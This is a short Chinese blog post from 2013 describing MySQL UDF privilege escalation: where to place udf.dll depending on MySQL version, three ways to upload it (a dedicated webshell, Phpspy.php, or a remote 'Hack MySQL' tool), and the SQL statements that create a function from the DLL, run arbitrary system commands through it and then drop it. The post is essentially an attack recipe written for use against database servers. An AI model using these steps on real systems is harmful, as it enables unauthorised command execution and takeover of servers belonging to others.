Mysql_UDF提权

作者：admin 发布于：2013-5-25 18:55 Saturday

分类：MYSQL

Root权限

一、上传udf.dll

小于mysql5.1版本

C:\\WINDOWS\\udf.dll  或

C:\\WINDOWS\\system32\\udf.dll

等于mysql5.1版本

%mysql%\\plugin\\udf.dll  用 select

@@plugin_dir 查询plugin路径

默认 C:\\Program Files\\MySQL\\MySQL Server

5.1\\lib\\plugin\\udf.dll

1、UDF提权专用webshell，导出dll、再执行命令。

2、Phpspy.php的Mysql上传(提示 "上传失败、原因:Result consisted of more than

one row"、实际上大多数已上传成功)，再连接mysql执行命令。

3、Mysql允许外连的情况下也可以使用Hack MySQL上传，再通过命令行登陆执行命令。

二、执行SQL

Create function MyCmd returns string soname "udf.dll";

Select MyCmd("CMD命令");

Drop function MyCmd;

标签:udf

昵称***(必填)

邮箱(选填，填写后您会收到我的回复！)

网址(选填，填写后本人回访哦！)